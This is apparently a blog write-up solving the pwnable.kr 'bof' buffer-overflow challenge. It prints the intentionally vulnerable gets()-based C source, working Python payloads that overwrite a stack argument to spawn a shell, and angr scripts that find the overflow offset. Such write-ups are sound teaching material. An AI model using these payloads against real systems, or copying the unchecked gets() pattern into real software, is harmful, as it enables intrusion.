pwnable.kr - bof

Posted on Jun 20, 2023

Write-up

The bof challenge is the third of the Toddler’s Bottle challenges in pwnable.kr. We’ll go over 2 different ways to solve it: in the first one we’ll reverse the sample, identify the buffer overflow and analyse how we can exploit it, and in the second one we’ll use angr to find the buffer overflow and provide us with the payload to trigger it.

The description of the challenge is the following:

Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?

Download : http://pwnable.kr/bin/bof

Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

This one is slightly different, as we’re not provided with a login, just an endpoint to connect to. We can already assume the bof binary is exposed on port 9000 and we must exploit it to get the flag.

Let’s start by checking the source for it:

 1#include <stdio.h>
 2#include <string.h>
 3#include <stdlib.h>
 4void func(int key){
 5	char overflowme[32];
 6	printf("overflow me : ");
 7	gets(overflowme);	// smash me!
 8	if(key == 0xcafebabe){
 9		system("/bin/sh");
10	}
11	else{
12		printf("Nah..\n");
13	}
14}
15int main(int argc, char* argv[]){
16	func(0xdeadbeef);
17	return 0;
18}

Initially the code does not make much sense, as we want to reach line 9, but func is called on line 16 with the value 0xdeadbeef. To better understand where the program is vulnerable, let’s consider the stack when func is called:

To pass 0xdeadbeef as an argument, it is pushed into the stack
When the call happens, the instruction to return after func is done is pushed into the stack
When inside func, a new stackframe is created and the previous one is saved into the stack
Space for func local variables is allocated, in this case, the only local variable is overflowme with size 32

Taking into account the stack grows to lower addresses, the following would represent the stack after func’s prologue:

+---------+----------------+
| Address |    Content     |
+---------+----------------+
| 0x00    | ... contents   |
| ...     | ... of         |
| 0x19    | ... overflowme |
| 0x20    | Saved EBP      |
| 0x24    | Saved EIP      |
| 0x28    | 0xdeadbeef     |
+---------+----------------+

With this visualization and the knowledge that gets only stops when it finds a newline or end-of-file, we can see that if we provide a string bigger than 32 bytes, in this case 44 bytes, we should be able to overwrite the 0xdeadbeef value with the one we want.

If we try to send a payload like that:

$ python3 -c 'import sys; sys.stdout.buffer.write(b"A"*40 + b"\xbe\xba\xfe\xca")' | ./bof
overflow me : 
Nah..
*** stack smashing detected ***: terminated
Aborted (core dumped)

… We fail, but the program does recognize stack smashing. Let’s dig a litte more into to understand why we’re failing.

Starting with the *** stack smashing detected ***: terminated message, this exists because the program was compiled with the use of canaries. A canary is nothing but a somewhat random value that is placed in the stack right after the function prologue. Before the function epilogue there’s a check if it was tampered with. If it was, the __stack_chk_fail function is called and we get an error message. The following image shows in blue where the canary is used. We can see that it comes from offset 0x14 of the gs segment register.

Looking at the rest of the assembly we can see in orange that the function allocates 0x48 bytes for it’s local stack frame. This might seem somewhat weird, given we know there’s only one variable (overflowme) in the source code. This behaviour exists the of the compiler is configured to handle padding, alignment and boundaries. Another relevant factor is that cdecl is the used calling convention, where the arguments are passed in the stack and cleaned by the caller. gets takes a pointer to the string as argument (char *), which we can see in red, where the address of overflowme is loaded into the top of the stack, right before gets gets called.

If we take the previously into consideration, and also looking at the stack layout in the beginning of the image, we know that the overflowme variable is at offset 0x30 (overflowme takes 0x20, canary takes 0xC, and the saved EBP takes 0x4). We need 0x30 bytes to reach the return address, and then 4 more overwrite the return address. Only then can we place our target value, which will overwrite func’s argument. Our payload becomes:

$ python3 -c 'import sys; sys.stdout.buffer.write(b"A"*0x34 + b"\xbe\xba\xfe\xca")' | ./bof
overflow me : 
*** stack smashing detected ***: terminated
Aborted (core dumped)

Ok, so we’re not getting the Nah.., which means we got into the right branch, but the program exits. This is because of how our input is sent, by piping the output of python into the program, it knows there’s nothing else to read (an end of file - EOF is sent), and consequently the program exits. To prevent this we must concatenate our payload with stdin, so we can send more data. We can do that using cat <(python3 ...) - | ./bof, the <() creates an unnamed pipe, which basically means that whatever is inside the parenthesis gets placed into a pipe (basically a file).

Our final payload should then be:

$ cat <(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*0x34 + b"\xbe\xba\xfe\xca" + b"\x0a")') - | ./bof
overflow me : 
ls
bof bof.c

Note that we also added b"\x0a" to the payload, this is because gets stops reading when it finds a newline or EOF. If we don’t send that newline, we’d need to manually send a newline to tell gets the string has ended.

Let’s now explore how we could solve this challenge using angr, a symbolic execution framework.

Solving Using `angr`

An alternative way of solving this simple buffer overflow is by using angr. This method allows us to avoid having to find the correct size for the payload, and let angr do that for us.

We’ll start by taking note of the address we want to find and the address we want to avoid. If we take a look at the assembly again, our target address is 0x65d and we want to avoid 0x66b:

With this we can quickly write the following script:

import sys

import angr


def main():
    project = angr.Project('./bof')
  
    # Based on the assembly, we fetch which branch we want to hit, which one we want to avoid
    good_addr = 0x65d
    bad_addr = 0x66b

    # We create an entry_state, which makes the program run from the entry point
    init_state = project.factory.entry_state()

    # We create the simulation engine based on the initial state
    simulation = project.factory.simgr(init_state)
    # and tell it to explore states until it finds the good_addr while also avoiding the bad_addr
    simulation.explore(find=good_addr, avoid=bad_addr)

    # the found property is an array with states that reached our good_addr.
    # If this exists, there's at least one solution. In this case there will only
    # be one, there's only one way to reach the good_addr)
    if simulation.found:
        solution_state = simulation.found[0]

        # The input is passed from gets, which consumes from stdin. We must get the contents
        # of the stdin when we're in a state that reached our good_addr
        print(solution_state.posix.dumps(sys.stdin.fileno()))
    else:
        print('No solution found!')


if __name__ == '__main__':
    main()

And if we run it:

$ python solve.py 
WARNING  | angr.storage.memory_mixins.default_filler_mixin | The program is accessing register with an unspecified value. This could indicate unwanted behavior.
WARNING  | angr.storage.memory_mixins.default_filler_mixin | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by:
WARNING  | angr.storage.memory_mixins.default_filler_mixin | 1) setting a value to the initial state
WARNING  | angr.storage.memory_mixins.default_filler_mixin | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null
WARNING  | angr.storage.memory_mixins.default_filler_mixin | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to suppress these messages.
WARNING  | angr.storage.memory_mixins.default_filler_mixin | Filling register edi with 4 unconstrained bytes referenced from 0x4006b1 (__libc_csu_init+0x1 in bof (0x6b1))
WARNING  | angr.procedures.libc.gets | The use of gets in a program usually causes buffer overflows. You may want to adjust SimStateLibc.max_gets_size to properly mimic an overflowing read.
WARNING  | angr.engines.successors | Exit state has over 256 possible solutions. Likely unconstrained; skipping. <BV32 Reverse(packet_0_stdin_14_2040[1655:1624])>
WARNING  | angr.engines.successors | Exit state has over 256 possible solutions. Likely unconstrained; skipping. <BV32 Reverse(packet_0_stdin_14_2040[1655:1624])>
No solution found!

Let’s try and understand what’s happening here. We first get a warning that there’s an access to a register with an unspecified value. As mentioned by angr, we could solve this by setting the default to be zero concrete values or symbolic values.

We then have a warning about gets, indicating that we can set the maximum size of the symbolic bytes that will be created from calling gets.

And finally we have a warning about 2 exit states that have over 256 possible solutions, making it unconstrained.

All of this yields to no solution being found, so how can we address this?

We can ignore the warning about unspecified values, as our interest is in the value of the stdin pipe. If we really want to mute these warnings, we can create the state with the following options:

init_state = project.factory.entry_state(add_options={
	angr.options.ZERO_FILL_UNCONSTRAINED_MEMORY,
	angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS
})

As for the second warning, we also are not very concerned about it, but if we wanted to change the maximum symbolic bytes for gets we could use:

init_state.libc.max_gets_size = 0x40

The last 2 messages about the 256 possible solutions are our main issue. This happens because when we reach both the target and the avoid address the EIP will be overwritten by the contents fetched from gets, and because these are symbolic values the program execution becomes unconstrained, as there are no further states to move to, given that the EIP is a symbolic value!

There are multiple ways to address this, but the one we’ll use is the following: instead of using the explore with the find and avoid addresses, we’ll use a lambda in find which will trigger the exploration to stop when it finds the 0xcafebabe bytes in stdin. The script becomes:

import sys

import angr


def main():
    project = angr.Project('./bof')
  
    # We create an entry_state, which makes the program run from the entry point
    init_state = project.factory.entry_state(add_options={
        angr.options.ZERO_FILL_UNCONSTRAINED_MEMORY,
        angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS
    })

    # We create the simulation engine based on the initial state
    simulation = project.factory.simgr(init_state)
    # and tell it to explore states until it finds the good_addr while also avoiding the bad_addr
    simulation.explore(find=lambda s: b'\xbe\xba\xfe\xca' in s.posix.dumps(sys.stdin.fileno()))

    # the found property is an array with states that reached our good_addr.
    # If this exists, there's at least one solution. In this case there will only
    # be one, there's only one way to reach the good_addr)
    if simulation.found:
        solution_state = simulation.found[0]

        # The input is passed from gets, which consumes from stdin. We must get the contents
        # of the stdin
        stdin = solution_state.posix.dumps(sys.stdin.fileno())
        print(stdin)
        overflow_bytes = stdin.find(b'\xbe\xba\xfe\xca')
        print(f'Bytes to overflow: {hex(overflow_bytes)}')
    else:
        print('No solution found!')


if __name__ == '__main__':
    main()

If we now run this script:

$ python solve.py 
WARNING  | angr.procedures.libc.gets | The use of gets in a program usually causes buffer overflows. You may want to adjust SimStateLibc.max_gets_size to properly mimic an overflowing read.
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbe\xba\xfe\xca\x00\x00\x00\x00\x00\x00\x00'
Bytes to overflow: 0x34

And here we have it, we’ve reached the same value as before: we need 0x34 bytes followed by 0xcafebabe to reach the branch we want.

Conclusion

We went over two different approaches to solving this challenge, which made the post bigger than it could’ve been. But it allowed us to get a better understanding of how we can use angr to tackle more specific problems.

pwnable.kr - bof

Recommended Reading

Write-up

Solving Using angr

Conclusion

Solving Using `angr`